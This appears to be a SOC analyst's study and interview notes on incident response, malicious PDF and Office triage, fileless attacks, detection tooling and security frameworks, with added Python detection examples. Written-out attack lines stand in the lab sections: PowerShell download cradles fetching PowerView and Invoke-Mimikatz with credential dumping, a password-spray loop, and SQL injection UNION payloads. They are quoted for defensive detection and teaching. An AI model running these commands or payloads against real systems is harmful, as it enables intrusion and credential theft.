I will do actions like: I will connect to this patient zero, move it to our isolated platform or another site using the EDR, disconnect it from the network, internet and everything. It's just me and this machine.
After that, permanently block the IP addresses; check the dashboards, maybe there are some Russian, North Korean or Ukrainian IP addresses connecting to our system, the domains, the hashes, those uncommon ports that are present in the logs. Block them.
Next is the eradication phase. It's the full removal of the remnants or the artifacts of the attacker in our environment.
Since we saw some binary that was dropped in the %Temp%, %AppData% or %Public% folder, it's about time to remove it.
We can also check for persistence, like a created scheduled task or a modified binary in the Run keys and Startup folder.
It's also time to patch the system, maybe there is a vulnerability, and kill some processes. We can also initiate an anti-malware and IOC scan on the whole system for eradication.
For the recovery procedure, it's some sort of making sure that all the applications on the system unit are running and updated before putting it back into production, and making some verified backups as well. For post-incident activity, which is very important, we can put in the report how it bypassed our security controls at the perimeter level, maybe some configuration problem with our ESG or something like that, and how we can detect this kind of initial access where an email attachment is compressed and password protected. Conduct security awareness training: if you are not expecting an email and it's not from our organization, you should report it to the IT team.

We have an alert in our SIEM. We detected a file on this machine that is connecting to an external IP address. What will you do?
Okay, for this scenario I will expect that the preparation and detection phases are done already. I will focus on the analysis until the last phase. First, I will check the rebuild: what is the detection strategy that triggered the alert? Maybe this is related to some process creation, like notepad.exe spawning cmd or PowerShell and connecting to some offending IP; I can see there what arguments were used. After that I will check the IP notes, sensor notes and alert notes; maybe this is normal behavior in the client's environment, like they are testing something. Aside from that, I will check the reputation of the IP address involved, the hashes and some domains, after pulling all the available logs to see which internal machine it was in that time frame. If there are no related notes on this and it has a malicious reputation based on the tools that were used, I will block it as part of the containment phase: put the hashes in the EDR and the IP address and domain on the firewall, and request a permanent block after confirming with the customer side that they don't have any business with them. For the eradication phase I will delete the files involved, kill the process and patch the system. We can also initiate an anti-malware and IOC scan on the whole system for eradication.
For the recovery procedure, it's some sort of making sure that all the applications on the system unit are running and updated, and making some verified backups as well. For post-incident activity, which is very important, we can put in the report how it bypassed our security controls at the perimeter level, maybe some configuration problem or something like that. Conduct security awareness training: if you are not expecting an email and it's not from our organization, you should report it to the IT team.

Investigating Malicious PDF: Analysis

cmd.exe - file path: cd C:\Users\IEUser\Desktop\CDTH Lab Files\Day3\PDF
HxD
"exiftool(-k).exe"
pdfid.py
pdf-parser.py Lucy2.pdf
pdf-parser.py Lucy2.pdf > Lucy2.txt
pdf-parser.py --search Javascript Lucy2.pdf
pdf-parser.py --search Launch Lucy2.pdf
pdf-parser.py --object=147 --filter --raw Lucy2.pdf
pdf-parser.py --object=148 --filter --raw Lucy2.pdf
pdf-parser.py --object=147 --filter --raw Lucy2.pdf > object147.js
pdf-parser.py --object=148 --filter --raw Lucy2.pdf > object148.js
Yes, I know how to do some basic analysis on PDF files to tell if they are malicious or not. I'm using some Didier Stevens tools.
First, I can use HxD (Hex and Disk Editor) to confirm the header information. For example, maybe this is a .exe file but changed into .pdf to trick the user into opening it. Next, I can use exiftool to extract some metadata like when it was created, what the version is, what the creator tool is (maybe this was created using PowerShell scripts), when it was modified, the title and subject, etc. After that I can use pdfid to check for certain PDF keywords; maybe it contains JavaScript, OpenAction (an automatic action to be performed when the file is viewed) and Launch (the counts of those automatic actions, maybe 1, 2 or more). Next is pdf-parser for more in-depth analysis of the PDF; we can look for the maliciousness of the file and I can extract it for further examination of the object.

Analyzing Microsoft Office Documents


cmd.exe file path cd C:\Users\IEUser\Desktop\CDTH Lab Files\Day3\Tools
HxD
"exiftool(-k).exe"
OfficeMalScanner.exe Test.xls
OfficeMalScanner.exe Test.xls scan brute debug
DisView.exe Test.xls 0x23c
Malhost-Setup.exe Test.xls Malcode.exe 0x23c
PowerShell (Run as Admin) - Get-Filehash Malcode.exe
First, I can use HxD (Hex and Disk Editor) to confirm the header information; for
example maybe this is a .exe file that was renamed to .doc to trick the user into
opening it. Next I can use exiftool to extract some metadata like when it was
created, file permissions, when it was modified, the title, author and subject, etc.
After that I can use OfficeMalScanner to scan the file for VB scripts and known
exploit signatures. It can also scan the document for PE headers even if they are
encoded. If an OLE2 compound document is detected, that means there are embedded
links or objects in the file. Since we found a signature offset we should debug it
to see that data and analyze it, but if you are not well versed in tracing assembly
code, the recommendation is to turn it into an executable file using Malhost-Setup;
then we can do some static analysis on it or just check the hash to know if it's
malicious.
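The two header checks above (is the .pdf or .xls really what its extension says?) and the pdfid keyword count, written out as an added Python example that is not part of these notes or of Didier Stevens' tools. The sample PDF, OLE2 header and EXE stub are constructed inline; the magic bytes are the real ones for those formats, and the hex-escape decoding shows why a plain text search for "/JavaScript" is not enough.

```python
import re

# Magic bytes of the container formats discussed in these notes.
MAGIC = {
    b"%PDF-": "pdf",
    b"MZ": "exe",                                   # PE executable
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2",    # legacy .doc/.xls compound file
    b"PK\x03\x04": "zip",                           # .docx/.xlsx are zip containers
}

# Which container each extension is allowed to have (anything else is a mismatch).
EXPECTED = {"pdf": {"pdf"}, "doc": {"ole2"}, "xls": {"ole2"},
            "docx": {"zip"}, "xlsx": {"zip"}, "exe": {"exe"}}

# The keywords pdfid counts; each is a hint that the PDF can act on open, not proof of malice.
PDF_KEYWORDS = [b"/JS", b"/JavaScript", b"/OpenAction", b"/AA",
                b"/Launch", b"/EmbeddedFile", b"/ObjStm"]


def detect_format(data: bytes) -> str:
    """Identify the container from the leading bytes, like the HxD header check."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def header_matches_extension(filename: str, data: bytes) -> bool:
    """False when the extension promises one format but the header says another."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return detect_format(data) in EXPECTED.get(ext, set())


def normalize_names(data: bytes) -> bytes:
    """PDF names may hex-escape characters (/Java#53cript); decode them so a
    keyword count cannot be dodged by that spelling."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def count_pdf_keywords(data: bytes) -> dict:
    """pdfid-style keyword counts over the raw file."""
    data = normalize_names(data)
    counts = {}
    for kw in PDF_KEYWORDS:
        # The lookahead stops /JS from matching a longer name such as /JSx.
        counts[kw.decode()] = len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9_])", data))
    return counts


def triage(filename: str, data: bytes) -> dict:
    """Combine the checks into the first verdict an analyst wants."""
    fmt = detect_format(data)
    findings = []
    if not header_matches_extension(filename, data):
        findings.append(f"header says {fmt} but extension is .{filename.rsplit('.', 1)[-1]}")
    keywords = count_pdf_keywords(data) if fmt == "pdf" else {}
    automatic = keywords.get("/OpenAction", 0) + keywords.get("/AA", 0)
    active = keywords.get("/JS", 0) + keywords.get("/JavaScript", 0) + keywords.get("/Launch", 0)
    if automatic and active:
        findings.append("automatic action combined with JavaScript/Launch")
    return {"format": fmt, "keywords": keywords, "findings": findings}


# Constructed samples (not real malware): a PDF whose catalog fires JavaScript
# and a Launch action on open, an OLE2 header, and an EXE renamed to .pdf.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /Java#53cript /JS (app.alert(1)) /Next 3 0 R >> endobj\n"
    b"3 0 obj << /S /Launch /F (payload.exe) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
SAMPLE_OLE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
SAMPLE_EXE = b"MZ\x90\x00" + b"\x00" * 60

if __name__ == "__main__":
    for name, blob in [("Lucy2.pdf", SAMPLE_PDF), ("Test.xls", SAMPLE_OLE), ("invoice.pdf", SAMPLE_EXE)]:
        print(name, triage(name, blob))
```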

Fileless malware is a type of malicious software that uses legitimate programs like
cmd or PowerShell to blend into normal activity and be more stealthy. It's a kind of
attack that runs in memory; it's not touching the disk and it's more sophisticated,
so anti-malware defenses, even with updated signatures, can't easily detect it. An
example: the adversary tricks the user into clicking a link and downloading a file;
when executed, it uses cmd in the background to launch PowerShell, which connects
to, let's say, some repository on GitHub, pulls PowerShell Empire and automatically
runs its payload. Empire is a pure PowerShell post-exploitation framework. It quickly
deploys a lot of post-exploitation modules ranging from keyloggers to Mimikatz, and
adaptable communications to evade network detection, all wrapped up in one framework.
We can use DeepBlueCLI, a PowerShell module for threat hunting via Windows event
logs, and other frameworks to investigate this.
Incident Response: Detecting Host Fileless Attacks
PowerShell (Run as Admin)
cd "C:\Users\IEUser\Desktop\CDTH Lab Files\Day2\DeepBlueCLI-master"
.\DeepBlue.ps1 .\evtx\password-spray.evtx 4648 Password Spray Attack -
1102 Audit Logs Was Cleared
.\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-security.evtx 4688 A new
process has been created
powershell.exe -exec Bypass -noexit -C "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/
PowerTools/master/PowerView/powerview.ps1')"
powershell.exe -exec bypass -C "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/
Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz
-DumpCreds"
.\DeepBlue.ps1 -log PowerShell
.\DeepBlue.ps1 -log PowerShell | Out-GridView
PowerShell (Run as Admin)
Foreach ($num in 1..100){echo bad | runas /user:guidem$num cmd.exe}
.\DeepBlue.ps1 -log Security
.\DeepBlue.ps1 -log Security | Out-GridView
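What the DeepBlueCLI runs above are looking for, as an added Python example of my own (not DeepBlueCLI's code): a download-cradle / execution-policy-bypass check on 4688 command lines, a password-spray check on bursts of 4648 events from one host, and the 1102 audit-log-cleared flag. The events, hosts, account names and URL are constructed placeholders; the regexes are my own approximation of the traits, not DeepBlueCLI's rules.

```python
import re
from datetime import datetime, timedelta

# Traits to flag in 4688 command lines (my own regexes, not DeepBlueCLI's).
SUSPICIOUS_PS = [
    (re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "Invoke-Expression"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "download cradle"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
]


def check_process_creation(cmdline: str) -> list:
    """Return the suspicious traits present in a 4688 (new process) command line."""
    return [label for rx, label in SUSPICIOUS_PS if rx.search(cmdline)]


def detect_password_spray(events, window=timedelta(minutes=5), threshold=5) -> list:
    """4648 is a logon attempted with explicit credentials. One source host trying
    many different accounts inside `window` is a spray, not a mistyped password."""
    by_host = {}
    for ev in events:
        if ev["id"] == 4648:
            by_host.setdefault(ev["host"], []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["time"])
        start, best = 0, None
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            accounts = {e["target"] for e in evs[start:end + 1]}
            if len(accounts) >= threshold and (best is None or len(accounts) > len(best["accounts"])):
                best = {"host": host, "accounts": sorted(accounts),
                        "first": evs[start]["time"], "last": evs[end]["time"]}
        if best:
            alerts.append(best)
    return alerts


def run_detections(events) -> list:
    """Walk the events once and return (event id, description) findings."""
    findings = []
    for ev in events:
        if ev["id"] == 1102:
            findings.append(("1102", f"audit log cleared on {ev['host']}"))
        elif ev["id"] == 4688:
            traits = check_process_creation(ev["cmdline"])
            if traits:
                findings.append(("4688", f"{ev['host']}: {', '.join(traits)}"))
    for a in detect_password_spray(events):
        findings.append(("4648", f"{a['host']}: {len(a['accounts'])} accounts tried in one window"))
    return findings


# Constructed sample events (hosts, accounts and URL are placeholders).
T0 = datetime(2021, 6, 1, 9, 0, 0)
SAMPLE_EVENTS = (
    [{"id": 4688, "host": "WS01", "time": T0,
      "cmdline": 'powershell.exe -exec Bypass -noexit -C "IEX (New-Object '
                 "Net.WebClient).DownloadString('https://example.invalid/tools.ps1')\""},
     {"id": 4688, "host": "WS02", "time": T0,
      "cmdline": r"C:\Windows\System32\notepad.exe C:\notes.txt"}]
    + [{"id": 4648, "host": "WS01", "time": T0 + timedelta(seconds=10 * i), "target": f"user{i}"}
       for i in range(6)]
    + [{"id": 4648, "host": "WS02", "time": T0, "target": "alice"},
       {"id": 1102, "host": "WS01", "time": T0 + timedelta(minutes=3)}]
)

if __name__ == "__main__":
    for event_id, text in run_detections(SAMPLE_EVENTS):
        print(event_id, text)
```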
Actually, I read something related to that online: if you are a CISO of an
organization and doing some security awareness you should be more sensitive as
well, because there was this CISO that ran a security awareness campaign during
COVID time, when people were desperate for money and bonuses.
This CISO created a bogus phishing email for security awareness in that
organization, telling people that you have this amount of bonus and it will be given
next month because the company is doing well as a team, we hit our targets, so
please click this link in order to confirm your identity, something like that.
This CISO got roasted on Twitter for being insensitive at a time like this, with a
lot of comments like: this is not how you run a security awareness program, it's
not the time to trick users with salary bonuses or whatever.
The suggestion here is to be sensitive when creating a security awareness program;
everyone is having a breakdown right now because of COVID, not everyone has the
capacity or capability to survive the next few weeks or months, people are so
desperate right now, so just be careful with that.

Malware Sandbox - is an isolated environment in a network that mimics end user
operating environments; sandboxes are used to safely execute suspicious code
without risking harm to the host or network devices.
By having a malware sandbox we have our own internal dynamic analysis platform,
wherein, let's say I'm not sure about this file and I want to make sure that it
doesn't connect to any other IP address at all, I will just drop it there and it
will automatically give me a report.
I think some malware sandboxes can be installed between the firewall or ESG so that
all of the attachments pass through the malware sandbox; if it's malicious, block
it, and if not, just let it pass.
FireEye AX, Falcon Sandbox, Any.Run, Joe Sandbox, Cuckoo Sandbox

Antimalware is more focused on signature-based detections; it uses a huge database
of signatures as its detection strategy. It can detect things in regular files that
touch the disk; its job is to scan the whole disk and any file that touches the
disk. The problem there is that if the attack or malware doesn't exist in the
database, it can easily bypass the system without any restrictions. Also, it's part
of the audit when your organization is subject to HIPAA, PCI DSS, GDPR or ISO 27001;
it's a requirement for those folks.
On the other side, EDR is not highly dependent on signatures; it's more focused on
TTPs or the behavioral side of things, for example an Excel file spawning PowerShell
or a PDF spawning cmd. It's a behavioral approach that catches what is not common
from the enterprise perspective. Also, I can do live response remotely: I can easily
connect to the infected machine through the management platform, then isolate or
disconnect the machine from the network, internet and everything. There are a lot
of features I can use. I can delete the malware or even download it for future
investigation, and kill malicious processes. It's very powerful.

EDR (Endpoint Detection & Response)

I can say that this is a CCTV camera on the endpoint, meaning it monitors any
execution, deletion, registry change or network connection being done at the host
level. It has a very powerful response mechanism: I can perform a network
containment wherein I disconnect the infected machine from the network and bring it
to an isolated platform where it's only me and the machine, and I can perform a
memory dump, data acquisition or disk image for full forensic examination if needed.
That's the beauty of EDR. I can also perform IOC scans and download the malicious
artifacts from that machine for further investigation.
Carbon Black Response, SentinelOne, FireEye, CrowdStrike, Cisco AMP, Cylance,
Endgame

DLP (Data Loss Prevention)

It's a security tool that protects business information from data breaches or
exfiltration. It also prevents end users from moving information outside the
network, based on its configuration. I think it can also monitor data accessed and
shared by end users; like if you copy and paste something, it will also keep a copy
of that on the server. Mostly it's used for compliance and data visibility; it's
part of the audit when your organization is subject to HIPAA, PCI DSS, GDPR,
ISO 27001, etc. It's a requirement for those folks, like anti-malware.
Honestly, I don't have any solid experience with DLP like implementing it from
scratch. Most of my experience here is monitoring, correlating and investigating
the logs forwarded by our customers.
Palo Alto, Proofpoint, Symantec, Zscaler

If I remember it clearly, we used these DLP logs in an insider threat incident. Our
client suspected that one of their privileged employees, who had given 15 days'
notice, was always taking overtime and maybe trying to access or exfiltrate some
data, so what we did there was extract multiple logs, including DLP logs, Windows
logs, USB logs and logon logs, based on the time frame they gave. After that we
investigated and correlated them, tied them together using the event IDs, and found
out that this user was logged in at that time, trying to access this folder and
exfiltrating the data using a flash drive. Then they closed the ticket; they would
be the ones to handle the incident from that point. Thank you for the assistance.
5145: A network share object was checked to see whether client can be granted
desired access
4656: A handle to an object was requested
4663: An attempt was made to access an object
4658: The handle to an object was closed
wmic diskdrive get interfacetype,mediatype,model
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB

Let's say I receive an alert on the event notifier of our SIEM regarding OpenVAS,
SQL injection, a password file or Nmap, anything related to an inbound vulnerability
scan. I will click the event and it will auto-redirect me to the monitoring
console. I will do a quick filter on the offending IP to check whether these alerts
also appear on the other sensors; after that I will check the rule to see what
detection strategy triggered the alert. I will also pull the logs for this IP to
check whether it was blocked by the other security controls deployed in the
environment. I will check if there are any alert notes, sensor notes or IP notes for
this; if there are no notes I will block it right away because it's an offending IP
that is not confirmed in the environment. I will start to create an IR email and put
in all the analysis that I did: based on the logs, the traffic was not automatically
blocked, the IP address involved has a malicious reputation, and it's scanning the
network to gain information that could help them compromise your system. Also, I
will tell them that I already permanently blocked the offending IP.

OWASP - Open Web Application Security Project


Top 10 Web Application Security Risks
A1:2017-Injection: Injection flaws, such as SQL, NoSQL, OS, and LDAP injection,
occur when untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing unintended
commands or accessing data without proper authorization.
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT username || '~' || password FROM users--
' UNION SELECT username, password FROM users--
' ORDER BY 1--
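The UNION payload listed above against a query that concatenates user input, beside the parameterized version that treats the same input as plain data. This is an added Python/sqlite3 example of my own, not OWASP's; the tables, rows and hash placeholders are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with the two tables the payloads above assume (constructed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT, price REAL)")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?, ?)",
                    [(1, "Mug", "gifts", 9.5), (2, "Laptop", "tech", 999.0)])
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "$2b$12$placeholder-hash-1"), ("bob", "$2b$12$placeholder-hash-2")])
    return con


def search_vulnerable(con, category: str) -> list:
    """Untrusted input spliced into the query text: the interpreter cannot tell
    where the data ends and the command begins, so a UNION rides along."""
    sql = f"SELECT name, price FROM products WHERE category = '{category}'"
    return con.execute(sql).fetchall()


def search_safe(con, category: str) -> list:
    """Parameterized query: the value is bound, never parsed as SQL, so the
    payload is just a category string that matches nothing."""
    return con.execute("SELECT name, price FROM products WHERE category = ?",
                       (category,)).fetchall()


# The two-column UNION payload from the list above (two columns to match name, price).
PAYLOAD = "' UNION SELECT username, password FROM users--"

if __name__ == "__main__":
    con = make_db()
    print("normal:", search_vulnerable(con, "gifts"))
    print("vulnerable + payload:", search_vulnerable(con, PAYLOAD))   # leaks the users table
    print("safe + payload:", search_safe(con, PAYLOAD))               # nothing matches
```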

PII - Personally Identifiable Information


It's any data that could potentially be used to identify a particular person.

PCI/DSS - Payment Card Industry/Data Security Standard


It's an information security standard for organizations that handle the major
branded credit card schemes, and it was created to increase the controls around
cardholder data to reduce fraud.
It applies to all merchants and services that process, transmit or store cardholder
data.
If our organization handles card payments, we must comply or suffer financial
penalties.
Validation of compliance is annual or quarterly, depending on transaction volumes.
It has 6 "Control Objectives"
1. Build and Maintain a Secure Network and Systems
2. Protect Cardholder Data
3. Maintain a Vulnerability Management Program
4. Implement Strong Access Control Measures
5. Regularly Monitor and Test Networks
6. Maintain an Information Security Policy
We have detected an SSN being sent from IP address X.X.X.X to IP address X.X.X.X in
clear text.
To help ensure that this information stays secure in transit, all numbers in this IR
email have been censored.
A malicious actor can take advantage of data transmitted in clear text. We advise
encrypting the data with a reliable encryption scheme before transmitting.
SSL TLS FTPS with DES AES RSA

CCPA - California Consumer Privacy Act


The intention of this is to provide California residents with the right to know
what personal data is being collected about them, whether their personal data is
sold or disclosed, the right to access their personal data if they want it, and
not to be discriminated against for exercising their privacy rights.

HIPAA - Health Insurance Portability and Accountability Act

It is a series of national standards that healthcare organizations must have in
place in order to safeguard the privacy and security of PHI.
PHI - Protected Health Information
is any demographic, individually identifiable information that can be used to
identify a patient.
PHI identifiers are address, email, medical records, account numbers, digital
identifiers, biometrics, etc.
Two types of organizations need to be HIPAA compliant: Covered Entities and
Business Associates.
Covered Entities are involved in the direct creation of PHI and must be compliant
with the full extent of HIPAA regulation.
HIPAA regulation defines a covered entity as healthcare providers, health plans,
and healthcare clearinghouses involved in the transmission of PHI.
A business associate is any organization hired by a covered entity who will
encounter PHI over the course of work they’ve been hired to perform.
HIPAA Privacy Rule protects PHI from unauthorized use or disclosure.
HIPAA Security Rule requires appropriate safeguards to be in place to maintain the
CIA of ePHI. Healthcare organizations must implement physical, technical, and
administrative safeguards to secure patient information.
HIPAA Breach Notification Rule outlines the processes that HIPAA-beholden entities
must follow in the event of a data breach.
HIPAA Omnibus Rule mandates that business associates must be HIPAA compliant.
Consequences:
Fines from the state and federal government.
Loss of CIA of valuable organizational data.
Lawsuits, loss of public trust, internal disciplinary action or termination of
employment.
Requirements for HIPAA compliance
STEP 1: Annual Audits
STEP 2: Remediation Plans
STEP 3: Policies and procedures
STEP 4: Documentation
STEP 5: Business Associate Management
STEP 6: Incident Management

GDPR - General Data Protection Regulation

It's a regulation in EU law on data protection and privacy. It's very strict on
what companies can do with personal data and how they use it; even sexual
preference or political opinion kinds of things are in its scope. I heard it's a
massive thing because the penalties or fines for non-compliance are really big,
more than 20 million dollars or 3% of the company's annual income. I believe if you
are non-compliant with PCI/DSS you are automatically hit by GDPR as well because of
PII. If I need to deep dive on these compliance things I can work on it.

ITIL - Information Technology Infrastructure Library

It's a set of practices for IT activities like IT service management and asset
management. If we are using the ITIL framework in our organization, there are
processes, procedures and checklists that we need to follow. It establishes the
baseline for what we can implement and measures the improvement that we need.

NIST - National Institute of Standards & Technology SP 800-61


It's the Computer Security Incident Handling Guide
Preparation, Detection & Analysis, Containment, Eradication & Recovery, Post-
Incident Activity

ISO/IEC 27001 - International Organization for Standardization / International
Electrotechnical Commission

It's an international standard on how to manage information security. It details
the requirements for establishing, implementing, maintaining and continually
improving an information security management system (ISMS) to help
organizations make their assets more secure.

COBIT - Control Objectives for Information and Related Technology

It is a framework that aims to help organizations that are looking to develop,
implement, monitor, and improve IT governance and information management. It also
ties in with ITIL & ISO 27000. I think it's also organized into 5 process domains:
Evaluate, Direct and Monitor (EDM)
Align, Plan and Organize (APO)
Build, Acquire and Implement (BAI)
Deliver, Service and Support (DSS)
Monitor, Evaluate and Assess (MEA)

OSINT - Open Source INTelligence


SOCMINT - SOCial Media INTelligence
SOX - Sarbanes-Oxley Act
FISMA - Federal Information Security Management Act of 2002
GLBA - Gramm–Leach–Bliley Act

IEC 62443
ICS/SCADA
Industrial control systems (ICS) are often managed via Supervisory Control and
Data Acquisition (SCADA) systems that provide a GUI for operators to easily
observe the status of a system, receive any alarms indicating out-of-band
operation, or enter system adjustments to manage the processes.

Triage Acquisition: "Quick WIN Forensics" using Live Response Collection/KAPE

We perform this to get the security artifacts that will make our investigation
faster; we will not wait for the full disk image of the entire hard drive to finish
before starting the investigation.
Your manager says that a confidential file was accessed by an unknown employee and
they suspect George. Tell me if he really accessed the confidential file using his
machine and when he accessed it. Only 2 questions to answer, so are we going to take
a full disk image of the entire hard drive? No! As an IR I will perform Triage
Acquisition: "Quick WIN Forensics" using Live Response Collection/KAPE.
Who was the employee that accessed the confidential file?
I can check the prefetch files, maybe he executed WinWord or a PDF reader, because
that is the file format.
This is a Windows artifact that gives you information on all executions happening
on the endpoint.
I can take a look at the LNK files and jump lists on George's machine, because
there I would see the recent files accessed by the user.
If he really accessed the file, I would also check the master file table just to
make sure of it; maybe it's George's machine but not his credentials.
Security Logs, Application Logs, ALL of the Windows Event Logs, Jumplist, Registry
Hives, Prefetch, Browser History, LNK Files, Master File Table, File System,
Emails, Shell Bag, etc.

Core Sources of Evidence (Non-Volatile)


Network Information, Startup Applications, Running Process Related Information
Open Shares, Mapped Drives, Scheduled Task, DNS Cache, File Timeline
Windows Services, Persistence Mechanism, Artifacts of Execution
File System Metadata, Windows Registry, Windows Event Logs
Typed URL's, Audit Policy, USB Related, Firewall Configuration
Drivers Installed and Running, DLL's Created, Opened Files

The pyramid of pain was created by David Bianco, a famous guy and SANS instructor.
This framework was created to highlight the different artifacts and what the impact
is to the adversaries if we detect them from a defensive approach.

The pyramid of pain consists of 6 different levels, from the bottom:
hash values - trivial
ip address - easy
domain names - simple
network/host artifacts - annoying
tools - challenging
ttps - tough!

Let's say I'm the attacker and the defenders are able to detect the hash value of
the file that I'm using; that's going to be trivial to me. I can easily change a
single character in my code, save it, compile it and then I will have a new hash
value; in just a snap I can easily change the hash value of it.

And then you find my IP address; as a defender you will block it, and for me that's
easy. I don't care, because I can easily spin up some cloud instance and it will
give me a new public IP address and then I can connect to your network again.

How about domain names? Sometimes adversaries don't really care about domain names;
they can simply register some weird domain name with a TLD of .win, .vip, .tk or
.kim for free and use it as a C2 channel. That's very simple for them.

How about network/host artifacts? Let's say, as a good defender, you have a
detection strategy where every executable file dropped in the %Temp folder gives
you an alert. That's going to be annoying to me, because for almost all of my
attack methodology I'm used to it.

And if you also have a good detection strategy for tools like Mimikatz for
credential dumping, or Cobalt Strike if there's a named pipe in the event and
network logs, oh, that's going to be challenging to me.

And now the top of the pyramid, the TTPs. It's already 2021 and, you know, we are
not just focusing on or detecting external attacks like port scanning and other
related attempts on our external network; we are also focusing now on the
behavioral kind of things. It's not just about hashes, IP addresses, domain names
and other IOCs; we are also detecting based on the behavior of a certain attack,
for example phishing. The common behavior of this technique is sending an email,
and when the target receives it, there will be a certain link or attachment with an
Excel file that asks the user to enable macros, and once it's enabled it will spawn
cmd or PowerShell in the background. The behavior, the logic behind this technique,
is the parent and child relationship wherein the file is spawning cmd or
PowerShell; that's the TTPs. There are 14 tactics, 185 techniques and I think 367
sub-techniques, you know, there's a lot to digest there.

Mitre is a nonprofit organization. It works in the public interest of governments
and other industries.
They are always innovating to help everyone that is working in the cyber world.
Mitre ATT&CK - It's a free framework of adversary TTPs based on real-world
observations.
Reconnaissance, Resource Development
Initial Access, Execution
Persistence, Privilege Escalation
Defense Evasion, Credential Access
Discovery, Lateral Movement
Collection, Command and Control
Exfiltration, Impact
Mitre SHIELD - They call it active defense; this is pretty new, they are
developing it to organize what we need to do in adversary engagements.
Channel, Collect, Contain, Detect, Disrupt, Facilitate, Legitimize, Test
Mitre D3FEND

A: Advanced P: Persistent T: Threat


Targeted, Coordinated, Purposeful Month after Month, Year after Year
Persons with Intent, Opportunity, and Capability
Lockheed Martin Cyber Kill Chain - It's a standard framework model for the
identification and prevention of cyber intrusion activity. It identifies what the
adversaries must complete or the phases in order to achieve their objective.
Reconnaissance - Enumeration employees, services, etc.
Weaponization - Creating a file with exploit included
Delivery - Transferring exploit to the victim
Exploitation - Asset exploited, unauthorized code run
Installation - Malicious code executes/installs
Command & Control - remote control of asset
Action on Objectives - exfiltration/destroy of data

Just a caveat here: sometimes it doesn't always need to start at the
reconnaissance phase. Sometimes the adversary is just exploiting the whole universe,
kind of thing, wherein if there is a public exploit available, for example
regarding Microsoft Exchange, they will just perform a massive scan of all Exchange
servers that are publicly accessible, and if one is still vulnerable, drop the
exploit, something like that.
But ideally an adversary that is attacking our organization will first do
reconnaissance, and then create the exploit itself, maybe they find some
vulnerabilities in our organization; that is the weaponization. They also need to
find a way to deliver the exploit, like phishing, or maybe they will drop a flash
drive in the organization's parking area and some associate there will open and
click the files on their unit; that would start the exploitation. It will install
some additional components of the payload to do the whole spectrum of the attack
and everything; after that it will have a successful connection to the C2 channels
that were prepared, and that is where they will do the action on objectives: it
might be data exfiltration, modifying the website or deleting the database.

Reconnaissance - Enumeration employees, services, etc.


Identify targets to attack: Staff email addresses and phone numbers, Enumerate
public facing hosts and systems. Fingerprint exposed services: Identify potential
vulnerabilities in these services. Identify third party connections or providers.
Collect contextual target information.

Weaponization - Creating a file with exploit included


Analyze reconnaissance collected data, Determine an appropriate initial access
vector, Stand up the attack infrastructure, Attack can be through social
engineering or technical compromise.

Delivery - Transferring exploit to the victim

Exploitation - Asset exploited, unauthorized code run

Installation - Malicious code executes/installs

Command & Control - remote control of asset

Action on Objectives - exfiltration/destroy of data


Incident Response Procedure Overview
IR procedures are the specific techniques and processes to use in an incident.
Organized into the following phases based on NIST SP 800-61
NIST: National Institute of Standards and Technology
These are the procedures:
Preparation, Detection & Analysis, Containment, Eradication & Recovery, Post-
Incident Activity

Preparation: IR GO Bag or "Jump Bag" or Attack Bag


Gather IR hardware and software ahead of time
Hardware and tools to include:
High power laptop, External hard drives / USB drives (forensically wiped)
Write blockers, Network taps, cables, small switch, Bootable Linux live CD, Gold
build image
Software and tools to include:
Live and dead box disk acquisition - FTK Imager, MagnetAcquire, SIFT, Paladin
Local and remote memory acquisition and analysis - WinPmem, FResponse, XWays,
MagnetRamCapture, Rekall, Volatility
Network acquisition and analysis software - SecurityOnion, Zeek, Suricata,
Networkminer, Wireshark
External hard drives, because a lot of times you will need more storage, since you
will be getting a lot of artifacts like an image or network logs that can contain
10 gigs or 100 gigs of data.
Write blockers, used to make sure the confidentiality as well as the integrity of
the data is intact.
Network taps, if you want to mirror the traffic.
Bootable Linux, because sometimes you will be using a Linux machine for tooling
purposes.
During the investigation there is live and dead box disk acquisition: where there
is live data you can use some tools to get the memory dump or the entire image of
the hard disk, then you can just mount it on your machine and get the necessary
files; for getting the hard disk image we can use FTK Imager.
Getting a memory dump is very, very useful when it comes to incident response,
because you will be surprised how much data is traversing memory, and if you don't
have the memory dump it could be hard for you. Getting a memory acquisition when you
are doing IR is highly recommended. We can use tools like Volatility for analyzing
it. And some network acquisition: sometimes you will be at a scene where there's
active ransomware or an active campaign from a different APT, so you need to tap
their network or get the network data, and these are the tools that you can use
there.

